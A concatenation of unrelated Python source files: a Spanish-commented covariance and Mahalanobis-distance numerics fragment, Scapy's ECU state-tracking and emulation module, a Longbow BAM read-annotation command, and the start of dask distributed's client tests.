qHext = [Queue() for nn in range(n)]
# lista de threads
proJ = list()
if hessianos:
proH = list()
# creo e inicializo los threads
for i in range(n):
# print('starting par de processos ', i + 3)
pJ = Process(target=procJext, args=(XextList[i], Xint, Ns,
params, i, qJext[i]))
proJ.append(pJ)
if hessianos:
pH = Process(target=procHext, args=(XextList[i], Xint, Ns,
params, i, qHext[i]))
proH.append(pH)
pJ.start() # inicio procesos
if hessianos:
pH.start()
jInt = jInt.get() # saco los resultados
if hessianos:
hInt = hInt.get()
for i in range(n):
jExt[i] = qJext[i].get() # guardo resultados
if hessianos:
hExt[i] = qHext[i].get()
pJInt.join() # espero a que todos terminen
if hessianos:
pHInt.join()
[p.join() for p in proJ]
if hessianos:
[p.join() for p in proH]
if hessianos:
return jInt, hInt, jExt, hExt
else:
return jInt, jExt
# %% calculo de varianza de una matriz de covarianza de MC
#PvecA = np.array([[1,0,0,0],
# [0,0,1,0],
# [0,1,0,0],
# [0,0,0,1]])
#
#const = (PvecA + np.eye(4))
# I matrix + transposition permutation matrix
const2 = np.array([[2, 0, 0, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 0, 2]])
def varVar2(c, N):
'''
para c de 2x2. calculates variance matrix 4x4 asuming wishart distribution
https://www.statlect.com/probability-distributions/wishart-distribution
'''
cKron = np.kron(c,c)
return const2.dot(cKron) / N
def varMahal(c1, n, c2, rank=False):
'''
calculate mahalanobis distance between two matrices, taking the first one
as reference (order is important)
if rank enabled, also returns the accumulated probability up to that
mahalanobis distance taking into account 3 degrees of freedom
'''
# se elimina la fila y columna redundante porque no aportan nada
c1Var = varVar2(c1, n)[[0,1,3]].T[[0,1,3]].T
c1Pres = inv(c1Var) # precision matrix
c1flat = c1[[0,0,1],[0,1,1]]
c2flat = c2[[0,0,1],[0,1,1]]
cFlatDif = c1flat - c2flat
mahDist = cFlatDif.dot(c1Pres).dot(cFlatDif)
if rank:
ranking = chi2.cdf(mahDist, 3)
return mahDist, ranking
else:
return mahDist
def trasPerMAt(k,l):
'''
returns the trasposition permutation matrix of matrix A of size (k, l)
https://www.statlect.com/probability-distributions/wishart-distribution#refMuirhead
'''
n = k*l
vecA = np.arange(n, dtype=int)
A = vecA.reshape((k,l))
vecAT = A.T.reshape(-1)
mat = np.zeros((n,n), dtype=int)
mat[[vecA],[vecAT]] = 1
return mat
def varVarN(c, Nsamples):
'''
returns the variance of a covariance matriz of size NxN calculated with
Nsamples samples
'''
cKron = np.kron(c,c)
n = c.shape[0]
const = np.eye(n**2) + trasPerMAt(n, n)
return const.dot(cKron) / Nsamples
|
ecu.py
|
#! /usr/bin/env python
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Nils Weiss <nils@we155.de>
# This program is published under a GPLv2 license
# scapy.contrib.description = Helper class for tracking Ecu states (Ecu)
# scapy.contrib.status = loads
import time
import random
import copy
from collections import defaultdict
from types import GeneratorType
from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \
Tuple, Type, cast, Dict, orb
from scapy.packet import Raw, Packet
from scapy.plist import PacketList
from scapy.sessions import DefaultSession
from scapy.ansmachine import AnsweringMachine
from scapy.config import conf
from scapy.supersocket import SuperSocket
__all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession",
"EcuAnsweringMachine"]
class EcuState(object):
"""
Stores the state of an Ecu. The state is defined by a protocol, for
example UDS or GMLAN.
A EcuState supports comparison and serialization (command()).
"""
def __init__(self, **kwargs):
# type: (Any) -> None
for k, v in kwargs.items():
if isinstance(v, GeneratorType):
v = list(v)
self.__setattr__(k, v)
def __getitem__(self, item):
# type: (str) -> Any
return self.__dict__[item]
def __setitem__(self, key, value):
# type: (str, Any) -> None
self.__dict__[key] = value
def __repr__(self):
# type: () -> str
return "".join(str(k) + str(v) for k, v in
sorted(self.__dict__.items(), key=lambda t: t[0]))
def __eq__(self, other):
# type: (object) -> bool
other = cast(EcuState, other)
if len(self.__dict__) != len(other.__dict__):
return False
try:
return all(self.__dict__[k] == other.__dict__[k]
for k in self.__dict__.keys())
except KeyError:
return False
def __contains__(self, item):
# type: (EcuState) -> bool
if not isinstance(item, EcuState):
return False
if len(self.__dict__) != len(item.__dict__):
return False
try:
return all(ov == sv or (hasattr(sv, "__iter__") and ov in sv)
for sv, ov in
zip(self.__dict__.values(), item.__dict__.values()))
except (KeyError, TypeError):
return False
def __ne__(self, other):
# type: (object) -> bool
return not other == self
def __lt__(self, other):
# type: (EcuState) -> bool
if self == other:
return False
if len(self.__dict__.keys()) < len(other.__dict__.keys()):
return True
if len(self.__dict__.keys()) > len(other.__dict__.keys()):
return False
common = set(self.__dict__.keys()).intersection(
set(other.__dict__.keys()))
for k in sorted(common):
if not isinstance(other.__dict__[k], type(self.__dict__[k])):
raise TypeError(
"Can't compare %s with %s for the EcuState element %s" %
(type(self.__dict__[k]), type(other.__dict__[k]), k))
if self.__dict__[k] < other.__dict__[k]:
return True
if self.__dict__[k] > other.__dict__[k]:
return False
if len(common) < len(self.__dict__):
self_diffs = set(self.__dict__.keys()).difference(
set(other.__dict__.keys()))
other_diffs = set(other.__dict__.keys()).difference(
set(self.__dict__.keys()))
for s, o in zip(self_diffs, other_diffs):
if s < o:
return True
return False
raise TypeError("EcuStates should be identical. Something bad happen. "
"self: %s other: %s" % (self.__dict__, other.__dict__))
def __hash__(self):
# type: () -> int
return hash(repr(self))
def reset(self):
# type: () -> None
keys = list(self.__dict__.keys())
for k in keys:
del self.__dict__[k]
def command(self):
# type: () -> str
return "EcuState(" + ", ".join(
["%s=%s" % (k, repr(v)) for k, v in sorted(
self.__dict__.items(), key=lambda t: t[0])]) + ")"
@staticmethod
def extend_pkt_with_modifier(cls):
# type: (Type[Packet]) -> Callable[[Callable[[Packet, Packet, EcuState], None]], None] # noqa: E501
"""
Decorator to add a function as 'modify_ecu_state' method to a given
class. This allows dynamic modifications and additions to a protocol.
:param cls: A packet class to be modified
:return: Decorator function
"""
def decorator_function(f):
# type: (Callable[[Packet, Packet, EcuState], None]) -> None
setattr(cls, "modify_ecu_state", f)
return decorator_function
@staticmethod
def is_modifier_pkt(pkt):
# type: (Packet) -> bool
"""
Helper function to determine if a Packet contains a layer that
modifies the EcuState.
:param pkt: Packet to be analyzed
:return: True if pkt contains layer that implements modify_ecu_state
"""
return any(hasattr(layer, "modify_ecu_state")
for layer in pkt.layers())
@staticmethod
def get_modified_ecu_state(response, request, state, modify_in_place=False): # noqa: E501
# type: (Packet, Packet, EcuState, bool) -> EcuState
"""
Helper function to get a modified EcuState from a Packet and a
previous EcuState. An EcuState is always modified after a response
Packet is received. In some protocols, the belonging request packet
is necessary to determine the precise state of the Ecu
:param response: Response packet that supports `modify_ecu_state`
:param request: Belonging request of the response that modifies Ecu
:param state: The previous/current EcuState
:param modify_in_place: If True, the given EcuState will be modified
:return: The modified EcuState or a modified copy
"""
if modify_in_place:
new_state = state
else:
new_state = copy.copy(state)
for layer in response.layers():
if not hasattr(layer, "modify_ecu_state"):
continue
try:
layer.modify_ecu_state(response, request, new_state)
except TypeError:
layer.modify_ecu_state.im_func(response, request, new_state)
return new_state
class Ecu(object):
"""An Ecu object can be used to
* track the states of an Ecu.
* to log all modification to an Ecu.
* to extract supported responses of a real Ecu.
Example:
>>> print("This ecu logs, tracks and creates supported responses")
>>> my_virtual_ecu = Ecu()
>>> my_virtual_ecu.update(PacketList([...]))
>>> my_virtual_ecu.supported_responses
>>> print("Another ecu just tracks")
>>> my_tracking_ecu = Ecu(logging=False, store_supported_responses=False)
>>> my_tracking_ecu.update(PacketList([...]))
>>> print("Another ecu just logs all modifications to it")
>>> my_logging_ecu = Ecu(verbose=False, store_supported_responses=False)
>>> my_logging_ecu.update(PacketList([...]))
>>> my_logging_ecu.log
>>> print("Another ecu just creates supported responses")
>>> my_response_ecu = Ecu(verbose=False, logging=False)
>>> my_response_ecu.update(PacketList([...]))
>>> my_response_ecu.supported_responses
Parameters to initialize an Ecu object
:param logging: Turn logging on or off. Default is on.
:param verbose: Turn tracking on or off. Default is on.
:param store_supported_responses: Create a list of supported responses if True.
:param lookahead: Configuration for lookahead when computing supported responses
""" # noqa: E501
def __init__(self, logging=True, verbose=True,
store_supported_responses=True, lookahead=10):
# type: (bool, bool, bool, int) -> None
self.state = EcuState()
self.verbose = verbose
self.logging = logging
self.store_supported_responses = store_supported_responses
self.lookahead = lookahead
self.log = defaultdict(list) # type: Dict[str, List[Any]]
self.__supported_responses = list() # type: List[EcuResponse]
self.__unanswered_packets = PacketList()
def reset(self):
# type: () -> None
"""
Resets the internal state to a default EcuState.
"""
self.state = EcuState(session=1)
def update(self, p):
# type: (Union[Packet, PacketList]) -> None
"""
Processes a Packet or a list of Packets, according to the chosen
configuration.
:param p: Packet or list of Packets
"""
if isinstance(p, PacketList):
for pkt in p:
self.update(pkt)
elif not isinstance(p, Packet):
raise TypeError("Provide a Packet object for an update")
else:
self.__update(p)
def __update(self, pkt):
# type: (Packet) -> None
"""
Processes a Packet according to the chosen configuration.
:param pkt: Packet to be processed
"""
if self.verbose:
print(repr(self), repr(pkt))
if self.logging:
self.__update_log(pkt)
self.__update_supported_responses(pkt)
def __update_log(self, pkt):
# type: (Packet) -> None
"""
Checks if a packet or a layer of this packet supports the function
`get_log`. If `get_log` is supported, this function will be executed
and the returned log information is stored in the intern log of this
Ecu object.
:param pkt: A Packet to be processed for log information.
"""
for layer in pkt.layers():
if not hasattr(layer, "get_log"):
continue
try:
log_key, log_value = layer.get_log(pkt)
except TypeError:
log_key, log_value = layer.get_log.im_func(pkt)
self.log[log_key].append((pkt.time, log_value))
def __update_supported_responses(self, pkt):
# type: (Packet) -> None
"""
Stores a given packet as supported response, if a matching request
packet is found in a list of the latest unanswered packets. For
performance improvements, this list of unanswered packets only contains
a fixed number of packets, defined by the `lookahead` parameter of
this Ecu.
:param pkt: Packet to be processed.
"""
self.__unanswered_packets.append(pkt)
reduced_plist = self.__unanswered_packets[-self.lookahead:]
answered, unanswered = reduced_plist.sr(lookahead=self.lookahead)
self.__unanswered_packets = unanswered
for req, resp in answered:
added = False
current_state = copy.copy(self.state)
EcuState.get_modified_ecu_state(resp, req, self.state, True)
if not self.store_supported_responses:
continue
for sup_resp in self.__supported_responses:
if resp == sup_resp.key_response:
if sup_resp.states is not None and \
self.state not in sup_resp.states:
sup_resp.states.append(current_state)
added = True
break
if added:
continue
ecu_resp = EcuResponse(current_state, responses=resp)
if self.verbose:
print("[+] ", repr(ecu_resp))
self.__supported_responses.append(ecu_resp)
@staticmethod
def sort_key_func(resp):
# type: (EcuResponse) -> Tuple[bool, int, int, int]
"""
This sorts responses in the following order:
1. Positive responses first
2. Lower ServiceIDs first
3. Less supported states first
4. Longer (more specific) responses first
:param resp: EcuResponse to be sorted
:return: Tuple as sort key
"""
first_layer = cast(Packet, resp.key_response[0]) # type: ignore
service = orb(bytes(first_layer)[0])
return (service == 0x7f,
service,
0xffffffff - len(resp.states or []),
0xffffffff - len(resp.key_response))
@property
def supported_responses(self):
# type: () -> List[EcuResponse]
"""
Returns a sorted list of supported responses. The sort is done in a way
to provide the best possible results, if this list of supported
responses is used to simulate an real world Ecu with the
EcuAnsweringMachine object.
:return:
"""
self.__supported_responses.sort(key=self.sort_key_func)
return self.__supported_responses
@property
def unanswered_packets(self):
# type: () -> PacketList
"""
A list of all unanswered packets, which were processed by this Ecu
object.
:return: PacketList of unanswered packets
"""
return self.__unanswered_packets
def __repr__(self):
# type: () -> str
return repr(self.state)
@staticmethod
def extend_pkt_with_logging(cls):
# type: (Type[Packet]) -> Callable[[Callable[[Packet], Tuple[str, Any]]], None] # noqa: E501
"""
Decorator to add a function as 'get_log' method to a given
class. This allows dynamic modifications and additions to a protocol.
:param cls: A packet class to be modified
:return: Decorator function
"""
def decorator_function(f):
# type: (Callable[[Packet], Tuple[str, Any]]) -> None
setattr(cls, "get_log", f)
return decorator_function
class EcuSession(DefaultSession):
"""
Tracks modification to an Ecu object 'on-the-flow'.
The parameters for the internal Ecu object are obtained from the kwargs
dict.
`logging`: Turn logging on or off. Default is on.
`verbose`: Turn tracking on or off. Default is on.
`store_supported_responses`: Create a list of supported responses, if True.
Example:
>>> sniff(session=EcuSession)
"""
def __init__(self, *args, **kwargs):
# type: (Any, Any) -> None
DefaultSession.__init__(self, *args, **kwargs)
self.ecu = Ecu(logging=kwargs.pop("logging", True),
verbose=kwargs.pop("verbose", True),
store_supported_responses=kwargs.pop("store_supported_responses", True)) # noqa: E501
def on_packet_received(self, pkt):
# type: (Optional[Packet]) -> None
if not pkt:
return
self.ecu.update(pkt)
DefaultSession.on_packet_received(self, pkt)
class EcuResponse:
"""Encapsulates responses and the according EcuStates.
A list of this objects can be used to configure an EcuAnsweringMachine.
This is useful, if you want to clone the behaviour of a real Ecu.
Example:
>>> EcuResponse(EcuState(session=2, security_level=2), responses=UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"deadbeef1"))
>>> EcuResponse([EcuState(session=range(2, 5), security_level=2), EcuState(session=3, security_level=5)], responses=UDS()/UDS_RDBIPR(dataIdentifier=9)/Raw(b"deadbeef4"))
Initialize an EcuResponse capsule
:param state: EcuState or list of EcuStates in which this response
is allowed to be sent. If no state provided, the response
packet will always be send.
:param responses: A Packet or a list of Packet objects. By default the
last packet is asked if it answers an incoming
packet. This allows to send for example
`requestCorrectlyReceived-ResponsePending` packets.
:param answers: Optional argument to provide a custom answer here:
`lambda resp, req: return resp.answers(req)`
This allows the modification of a response depending
on a request. Custom SecurityAccess mechanisms can
be implemented in this way or generic NegativeResponse
messages which answers to everything can be realized
in this way.
""" # noqa: E501
def __init__(self, state=None, responses=Raw(b"\x7f\x10"), answers=None):
# type: (Optional[Union[EcuState, Iterable[EcuState]]], Union[Iterable[Packet], PacketList, Packet], Optional[Callable[[Packet, Packet], bool]]) -> None # noqa: E501
if state is None:
self.__states = None # type: Optional[List[EcuState]]
else:
if hasattr(state, "__iter__"):
state = cast(List[EcuState], state)
self.__states = state
else:
state = cast(EcuState, state)
self.__states = [state]
if isinstance(responses, PacketList):
self.__responses = responses # type: PacketList
elif isinstance(responses, Packet):
self.__responses = PacketList([responses])
elif hasattr(responses, "__iter__"):
responses = cast(List[Packet], responses)
self.__responses = PacketList(responses)
else:
raise TypeError(
"Can't handle type %s as response" % type(responses))
self.__custom_answers = answers
@property
def states(self):
# type: () -> Optional[List[EcuState]]
return self.__states
@property
def responses(self):
# type: () -> PacketList
return self.__responses
@property
def key_response(self):
# type: () -> Packet
pkt = self.__responses[-1] # type: Packet
return pkt
def supports_state(self, state):
# type: (EcuState) -> bool
if self.__states is None or len(self.__states) == 0:
return True
else:
return any(s == state or state in s for s in self.__states)
def answers(self, other):
# type: (Packet) -> Union[int, bool]
if self.__custom_answers is not None:
return self.__custom_answers(self.key_response, other)
else:
return self.key_response.answers(other)
def __repr__(self):
# type: () -> str
return "%s, responses=%s" % \
(repr(self.__states),
[resp.summary() for resp in self.__responses])
def __eq__(self, other):
# type: (object) -> bool
other = cast(EcuResponse, other)
responses_equal = \
len(self.responses) == len(other.responses) and \
all(bytes(x) == bytes(y) for x, y in zip(self.responses,
other.responses))
if self.__states is None:
return responses_equal
else:
return any(other.supports_state(s) for s in self.__states) and \
responses_equal
def __ne__(self, other):
# type: (object) -> bool
# Python 2.7 compat
return not self == other
def command(self):
# type: () -> str
if self.__states is not None:
return "EcuResponse(%s, responses=%s)" % (
"[" + ", ".join(s.command() for s in self.__states) + "]",
"[" + ", ".join(p.command() for p in self.__responses) + "]")
else:
return "EcuResponse(responses=%s)" % "[" + ", ".join(
p.command() for p in self.__responses) + "]"
__hash__ = None # type: ignore
conf.contribs['EcuAnsweringMachine'] = {'send_delay': 0}
class EcuAnsweringMachine(AnsweringMachine):
"""AnsweringMachine which emulates the basic behaviour of a real world ECU.
Provide a list of ``EcuResponse`` objects to configure the behaviour of a
AnsweringMachine.
Usage:
>>> resp = EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))
>>> sock = ISOTPSocket(can_iface, sid=0x700, did=0x600, basecls=UDS)
>>> answering_machine = EcuAnsweringMachine(supported_responses=[resp], main_socket=sock, basecls=UDS)
>>> sim = threading.Thread(target=answering_machine, kwargs={'count': 4, 'timeout':5})
>>> sim.start()
""" # noqa: E501
function_name = "EcuAnsweringMachine"
sniff_options_list = ["store", "opened_socket", "count", "filter", "prn",
"stop_filter", "timeout"]
def parse_options(self, supported_responses=None,
main_socket=None, broadcast_socket=None, basecls=Raw,
timeout=None):
# type: (Optional[List[EcuResponse]], Optional[SuperSocket], Optional[SuperSocket], Type[Packet], Optional[Union[int, float]]) -> None # noqa: E501
"""
:param supported_responses: List of ``EcuResponse`` objects to define
the behaviour. The default response is
``generalReject``.
:param main_socket: Defines the object of the socket to send
and receive packets.
:param broadcast_socket: Defines the object of the broadcast socket.
Listen-only, responds with the main_socket.
`None` to disable broadcast capabilities.
:param basecls: Provide a basecls of the used protocol
:param timeout: Specifies the timeout for sniffing in seconds.
"""
self.__ecu_state = EcuState(session=1)
# TODO: Apply a cleanup of the initial EcuStates. Maybe provide a way
# to overwrite EcuState.reset to allow the manipulation of the
# initial (default) EcuState.
self.__main_socket = main_socket # type: Optional[SuperSocket]
self.__sockets = [self.__main_socket]
if broadcast_socket is not None:
self.__sockets.append(broadcast_socket)
self.__basecls = basecls # type: Type[Packet]
self.__supported_responses = supported_responses
self.sniff_options["timeout"] = timeout
self.sniff_options["opened_socket"] = self.__sockets
@property
def state(self):
# type: () -> EcuState
return self.__ecu_state
def is_request(self, req):
# type: (Packet) -> bool
return isinstance(req, self.__basecls)
def print_reply(self, req, reply):
# type: (Packet, PacketList) -> None
print("%s ==> %s" % (req.summary(), [res.summary() for res in reply]))
def make_reply(self, req):
# type: (Packet) -> PacketList
"""
Checks if a given request can be answered by the internal list of
EcuResponses. First, it's evaluated if the internal EcuState of this
AnsweringMachine is supported by an EcuResponse, next it's evaluated if
a request answers the key_response of this EcuResponse object. The
first fitting EcuResponse is used. If this EcuResponse modified the
EcuState, the internal EcuState of this AnsweringMachine is updated,
and the list of response Packets of the selected EcuResponse is
returned. If no EcuResponse if found, a PacketList with a generic
NegativeResponse is returned.
:param req: A request packet
:return: A list of response packets
"""
if self.__supported_responses is not None:
for resp in self.__supported_responses:
if not isinstance(resp, EcuResponse):
raise TypeError("Unsupported type for response. "
"Please use `EcuResponse` objects.")
if not resp.supports_state(self.__ecu_state):
continue
if not resp.answers(req):
continue
EcuState.get_modified_ecu_state(
resp.key_response, req, self.__ecu_state, True)
return resp.responses
return PacketList([self.__basecls(
b"\x7f" + bytes(req)[0:1] + b"\x10")])
def send_reply(self, reply):
# type: (PacketList) -> None
"""
Sends all Packets of a EcuResponse object. This allows to send multiple
packets up on a request. If the list contains more than one packet,
a random time between each packet is waited until the next packet will
be sent.
:param reply: List of packets to be sent.
"""
for p in reply:
time.sleep(conf.contribs['EcuAnsweringMachine']['send_delay'])
if len(reply) > 1:
time.sleep(random.uniform(0.01, 0.5))
if self.__main_socket:
self.__main_socket.send(p)
|
command.py
|
import logging
import math
import sys
import itertools
import re
import time
import os
import click
import click_log
import tqdm
import ssw
import pysam
import multiprocessing as mp
import gzip
from construct import *
from ..utils import bam_utils
from ..utils.bam_utils import SegmentInfo
from ..utils.model import LibraryModel
logging.basicConfig(stream=sys.stderr)
logger = logging.getLogger("annotate")
click_log.basic_config(logger)
@click.command(name=logger.name)
@click_log.simple_verbosity_option(logger)
@click.option(
"-p",
"--pbi",
required=False,
type=click.Path(),
help="BAM .pbi index file",
)
@click.option(
"-t",
"--threads",
type=int,
default=mp.cpu_count() - 1,
show_default=True,
help="number of threads to use (0 for all)",
)
@click.option(
"-o",
"--output-bam",
default="-",
type=click.Path(exists=False),
help="annotated bam output [default: stdout]",
)
@click.option(
"-m",
"--model",
type=str,
default="mas15",
show_default=True,
help="The model to use for annotation. If the given value is a pre-configured model name, then that "
"model will be used. Otherwise, the given value will be treated as a file name and Longbow will attempt to "
"read in the file and create a LibraryModel from it. Longbow will assume the contents are the configuration "
"of a LibraryModel as per LibraryModel.to_json()."
)
@click.option(
"-c",
"--chunk",
type=str,
default="",
required=False,
help="Process a single chunk of data (e.g. specify '2/4' to process the second of four equally-sized "
"chunks across the dataset)"
)
@click.option(
"--max-length",
type=int,
default=60000,
show_default=True,
required=False,
help="Maximum length of a read to process. Reads beyond this length will not be annotated."
)
@click.option(
"--min-rq",
type=float,
default=-2,
show_default=True,
required=False,
help="Minimum ccs-determined read quality for a read to be annotated. CCS read quality range is [-1,1]."
)
@click.argument("input-bam", default="-" if not sys.stdin.isatty() else None, type=click.File("rb"))
def main(pbi, threads, output_bam, model, chunk, max_length, min_rq, input_bam):
"""Annotate reads in a BAM file with segments from the model."""
t_start = time.time()
logger.info("Invoked via: longbow %s", " ".join(sys.argv[1:]))
threads = mp.cpu_count() if threads <= 0 or threads > mp.cpu_count() else threads
logger.info(f"Running with {threads} worker subprocess(es)")
# Get our model:
if LibraryModel.has_prebuilt_model(model):
logger.info(f"Using %s", LibraryModel.pre_configured_models[model]["description"])
m = LibraryModel.build_pre_configured_model(model)
else:
logger.info(f"Loading model from json file: %s", model)
m = LibraryModel.from_json_file(model)
pbi = f"{input_bam.name}.pbi" if pbi is None else pbi
read_count = None
start_offset = 0
end_offset = math.inf
if not os.path.exists(pbi) and chunk is not "":
raise ValueError(f"Chunking specified but pbi file '{pbi}' not found")
if os.path.exists(pbi):
if chunk is not "":
(chunk, num_chunks) = re.split("/", chunk)
chunk = int(chunk)
num_chunks = int(num_chunks)
# Decode PacBio .pbi file and determine the shard offsets.
offsets, zmw_counts, read_count, read_counts_per_chunk = bam_utils.compute_shard_offsets(pbi, num_chunks)
start_offset = offsets[chunk - 1]
end_offset = offsets[chunk] if chunk < len(offsets) else offsets[chunk - 1]
read_count = read_counts_per_chunk[chunk - 1] if chunk < len(offsets) else 0
logger.info("Annotating %d reads from chunk %d/%d", read_count, chunk, num_chunks)
else:
read_count = bam_utils.load_read_count(pbi)
logger.info("Annotating %d reads", read_count)
# Create queues for data:
queue_size = threads * 2 if threads < 10 else 20
manager = mp.Manager()
input_data_queue = manager.Queue(maxsize=queue_size)
results = manager.Queue()
# Start worker sub-processes:
worker_pool = []
for i in range(threads):
p = mp.Process(
target=_worker_segmentation_fn, args=(input_data_queue, results, i, m, max_length, min_rq)
)
p.start()
worker_pool.append(p)
pysam.set_verbosity(0) # silence message about the .bai file not being found
with pysam.AlignmentFile(
input_bam if start_offset == 0 else input_bam.name, "rb", check_sq=False, require_index=False
) as bam_file:
# If we're chunking, advance to the specified virtual file offset.
if start_offset > 0:
bam_file.seek(start_offset)
# Get our header from the input bam file:
out_header = bam_utils.create_bam_header_with_program_group(logger.name, bam_file.header, models=[m])
# Start output worker:
res = manager.dict({"num_reads_annotated": 0, "num_sections": 0})
output_worker = mp.Process(
target=_write_thread_fn,
args=(results, out_header, output_bam, not sys.stdin.isatty(), res, read_count, m)
)
output_worker.start()
# Add in a sentinel value at the end of the queue - one for each subprocess - so we guarantee
# that all subprocesses will exit:
iter_data = itertools.chain(bam_file, (None,) * threads)
for r in iter_data:
# We have to adjust for our sentinel value if we've got to it:
if r is not None:
r = r.to_string()
input_data_queue.put(r)
if start_offset > 0:
if bam_file.tell() >= end_offset or r is None:
[input_data_queue.put(None) for _ in range(threads)]
break
logger.debug("Finished reading data and sending it to sub-processes.")
logger.debug("Waiting for sub-processes to finish...")
# Wait for our input jobs to finish:
for p in worker_pool:
p.join()
logger.debug("All workers stopped.")
logger.debug("Terminating output process.")
# Now that our input processes are done, we can add our exit sentinel onto the output queue and
# wait for that process to end:
results.put(None)
output_worker.join()
logger.info(
f"Annotated {res['num_reads_annotated']} reads with {res['num_sections']} total sections."
)
et = time.time()
logger.info(f"Done. Elapsed time: {et - t_start:2.2f}s. "
f"Overall processing rate: {res['num_reads_annotated']/(et - t_start):2.2f} reads/s.")
def get_segments(read):
"""Get the segments corresponding to a particular read by reading the segments tag information."""
return read.to_string(), [
SegmentInfo.from_tag(s) for s in read.get_tag(bam_utils.SEGMENTS_TAG).split(bam_utils.SEGMENT_TAG_DELIMITER)
]
def _write_thread_fn(out_queue, out_bam_header, out_bam_file_name, disable_pbar, res, read_count, model):
"""Thread / process fn to write out all our data."""
with pysam.AlignmentFile(
out_bam_file_name, "wb", header=out_bam_header
) as out_bam_file, tqdm.tqdm(
desc="Progress",
unit=" read",
colour="green",
file=sys.stderr,
disable=disable_pbar,
total=read_count
) as pbar:
ssw_aligner = ssw.Aligner()
while True:
# Wait for some output data:
raw_data = out_queue.get()
# Check for exit sentinel:
if raw_data is None:
break
# Should really never be None, but just in case:
elif raw_data is None:
continue
# Unpack data:
read, ppath, logp, is_rc = raw_data
# Condense the output annotations so we can write them out with indices:
segments = bam_utils.collapse_annotations(ppath)
read = pysam.AlignedSegment.fromstring(read, out_bam_header)
# Obligatory log message:
logger.debug(
"Path for read %s (%2.2f)%s: %s",
read.query_name,
logp,
" (RC)" if is_rc else "",
segments,
)
# Write our our read:
bam_utils.write_annotated_read(read, segments, is_rc, logp, model, ssw_aligner, out_bam_file)
# Increment our counters:
res["num_reads_annotated"] += 1
res["num_sections"] += len(segments)
pbar.update(1)
def _worker_segmentation_fn(in_queue, out_queue, worker_num, model, max_length, min_rq):
"""Function to run in each subthread / subprocess.
Segments each read and place the segments in the output queue."""
num_reads_segmented = 0
while True:
# Wait until we get some data.
# Note: Because we have a sentinel value None inserted at the end of the input data for each
# subprocess, we don't have to add a timeout - we're guaranteed each process will always have
# at least one element.
raw_data = in_queue.get()
# Check for exit sentinel:
if raw_data is None:
break
# Should really never be None, but just in case:
elif raw_data is None:
continue
# Unpack our data here:
read = raw_data
read = pysam.AlignedSegment.fromstring(
read, pysam.AlignmentHeader.from_dict(dict())
)
# Check for max length and min quality:
if len(read.query_sequence) > max_length:
logger.warning(f"Read is longer than max length. "
f"Skipping: {read.query_name} ({len(read.query_sequence)} > {max_length})")
continue
elif read.get_tag("rq") < min_rq:
logger.warning(f"Read quality is below the minimum. "
f"Skipping: {read.query_name} ({read.get_tag('rq')} < {min_rq})")
continue
# Process and place our data on the output queue:
segment_info = _segment_read(read, model)
out_queue.put(segment_info)
num_reads_segmented += 1
logger.debug(f"Worker %d: Num reads segmented: %d", worker_num, num_reads_segmented)
def _segment_read(read, model):
is_rc = False
logp, ppath = model.annotate(read.query_sequence)
rc_logp, rc_ppath = model.annotate(bam_utils.reverse_complement(read.query_sequence))
if rc_logp > logp:
logp = rc_logp
ppath = rc_ppath
is_rc = True
logger.debug("Sequence scored better in RC: %s", read.query_name)
return read.to_string(), ppath, logp, is_rc
|
test_client.py
|
from __future__ import annotations
import asyncio
import functools
import gc
import inspect
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import types
import warnings
import weakref
import zipfile
from collections import deque
from collections.abc import Generator
from contextlib import contextmanager, suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
from typing import Any
import psutil
import pytest
import yaml
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import parse_timedelta, stringify, tmpfile
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
ensure_default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.objects import HasWhat, WhoHas
from distributed.scheduler import (
COMPILED,
CollectTaskMetaDataPlugin,
KilledWorker,
Scheduler,
)
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text
from distributed.utils_test import (
TaskStateMetadataPlugin,
_UnhashableCallable,
async_wait_for,
asyncinc,
captured_logger,
cluster,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
get_cert,
inc,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
tls_only_security,
varying,
wait_for,
)
pytestmark = pytest.mark.ci1
@gen_cluster(client=True)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10, key="x")
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20, key="y")
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
